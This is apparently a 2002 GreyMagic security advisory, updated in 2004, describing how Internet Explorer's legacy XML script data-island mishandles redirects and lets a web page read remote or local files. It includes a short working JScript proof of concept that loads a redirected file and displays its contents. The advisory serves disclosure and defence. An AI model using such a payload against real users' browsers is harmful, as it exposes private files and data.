Products::Security

GreyMagic Security Advisory GM#009-IE

By GreyMagic Software, Israel.
23 Aug 2002.

Topic: Accessing remote/local content in IE.

Discovery date: 18 Feb 2002.

Affected applications:

All tested versions of Microsoft Internet Explorer (IE5+); prior versions may be vulnerable as well.

Note that any other application that uses Internet Explorer's engine (WebBrowser control) is affected as well (Outlook, MSN Explorer, etc.).

Introduction:

Back in 1997, when Internet Explorer 4 was first released, XML was just starting to become popular. The popularity of XML prompted Microsoft to devise the early prototype of XML data-islands, using the <script> element in conjunction with the "language" attribute set to "XML".

When Internet Explorer 5 was released the <script> data-island had been replaced with the more intuitive <xml> data-island. But even though the <script> syntax was now deprecated, Microsoft kept it for the sake of backwards compatibility.

Discussion:

By default the <script> data-island only allows URLs from the same domain as the document to be assigned to its "src" attribute. Unfortunately, it fails to correctly validate its "src" attribute against a redirection, which potentially allows any web page to do the following:

Any of the exploitations above may expose sensitive and private information belonging to the user.

The <script> data-island can be exploited by assigning a URL to the "src" attribute, which will redirect to a local or remote location. The XML engine will then process the content of that location.

In case the location does not contain valid XML content, parts of it can still be read by using XMLDOM's error mechanism. The "srcText" property of the "parseError" object will contain the line of text that could not be parsed by the engine. If the content does not contain line breaks at all then the entire content may be exposed.

Exploit:

This example reads the contents of a remote URL, "getFile.asp" redirects to the desired location, allowing us to read it:

<script language="xml" src="getFile.asp" id="oFile"></script>
<script language="jscript">
onload=function () {
    var oXD=oFile.XMLDocument,
        oPE=oXD.parseError;

    alert(
        oXD.firstChild || oPE.line>0 ?
            "File found!\n"+
            "Details:\n\n"+
            (oXD.xml || "Line "+oPE.line+" contains '"+oPE.srcText+"'")
        :
            "File does not exist or could not be retrieved."
    );
}
</script>

Solution:

Microsoft was first informed on 18 Feb 2002, a patch was finally released on 22 Aug 2002 after a long investigation and testing period.

Update - 9 Oct 2004

Apparently, there has been a regression in Internet Explorer that caused it to be vulnerable to this issue once again. The regression was spotted by Georgi Guninski.

Interestingly enough, the regression is only visible when the <script> block is introduced as static HTML in the page, dynamic blocks (via document.write) are protected.

Tested on:

IE5 NT4, remote locations only.
IE5.5 Win98, remote locations only.
IE5.5 NT4, both remote and local locations.
IE6 Win2000, remote locations only.
IE6 WinXP, both remote and local locations.

Demonstration:

Status: Waiting.

Disclaimer:

The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Vulnerability details are provided strictly for educational and defensive purposes.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Stay informed:

Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.

Press here to subscribe.

Your privacy is important to us, read our Privacy Statement.

Copyright © 2008 GreyMagic Software
Hosted by VPW Systems UK - Specialist Internet Services Provider